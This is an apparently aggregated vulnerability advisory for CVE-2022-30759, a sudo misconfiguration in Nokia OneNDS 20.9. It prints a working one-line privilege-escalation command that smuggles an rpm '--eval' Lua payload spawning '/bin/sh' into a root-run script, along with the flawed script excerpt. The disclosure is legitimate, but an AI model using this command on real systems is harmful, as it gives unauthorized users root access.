Security
Headlines
HeadlinesLatestCVEs

Headline

Nokia OneNDS 20.9 Insecure Permissions / Privilege Escalation

Nokia OneNDS 20.9 has loose sudo permissions that can allow users to escalate privileges.

Packet Storm
#vulnerability#nokia#rpm
===============================================================================             title: Incorrect Permission Assignment           product: Nokia OneNDS 20.9vulnerability type: Security Misconfiguration          severity: High        CVSS Score: 7.8       CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H          found on: 04/05/2022                by: Giacomo Sighinolfi <[email protected]>               cve: CVE-2022-30759===============================================================================Some sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands on the system.The affected users are:  Provgw, notifs, dbmrun,   (system users)They can run as root the following script:  /opt/cntdb/bin/noscripts_rpm.shIt can be exploited with:  sudo  /opt/cntdb/bin/noscripts_rpm.sh force-erase     "--eval '%{lua:os.execute(\"/bin/sh\")}'"===============================================================================  Detailed analysis:The script accept as first argument one of the these options:   install|update|fallback|erase|test-install|test-update|test-erase|  force-install|force-update|force-erase and as a second argument an arbitrary rpm package name.If we analyze the switch case code block (row 175) we can see how the first argument influence the execution of the script.175. case "$1" in…224.   test-erase)225.         TEST_OPTION="--test"226.         OPTION="-e"227.      ;;…238.   force-erase)239.         TEST_OPTION="--nodeps"240.         OPTION="-e"241.      ;;…Using “force-erase” or “test-erase” as the first argument, it creates “OPTION” variable with “-e” as its value. That value allow us to trigger a privilege escalation exploiting the rpm command (row 254) with a particular rpm package name as second parameter passed to the script.…252. if [ $OPTION == "-e" ]253. then254.   rpm $OPTION --noscripts $TEST_OPTION $2…===============================================================================

Related news

CVE-2022-30759: Nokia OneNDS 20.9 Insecure Permissions

In Nokia One-NDS (aka Network Directory Server) through 20.9, some Sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution